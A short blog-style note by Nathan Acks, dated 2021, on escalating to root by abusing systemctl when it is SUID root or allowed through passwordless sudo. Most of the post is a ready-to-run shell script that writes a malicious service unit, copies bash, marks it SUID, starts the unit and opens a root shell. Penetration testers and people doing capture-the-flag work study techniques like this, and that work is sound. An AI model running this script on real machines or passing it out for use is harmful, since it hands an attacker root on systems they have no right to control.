Exploiting “systemctl”

author: Nathan Acks
date: 2021-11-03

If systemctl is SUID root, then a malicious service file can easily be abused to create a root shell.

FILE=`mktemp -u`
echo "[Service]" >> $FILE.service
echo "Type=oneshot" >> $FILE.service
echo "ExecStart=/bin/cp /bin/bash $FILE.sh" >> $FILE.service
echo "ExecStart=/bin/chmod +xs $FILE.sh" >> $FILE.service
echo "[Install]" >> $FILE.service
echo "WantedBy=multi-user.target" >> $FILE.service
systemctl link $FILE.service
systemctl start $FILE.service
$FILE.sh -p # Root!

Even if systemctl is not SUID root, so long as you have NOPASSWD sudo access to it this trick will work.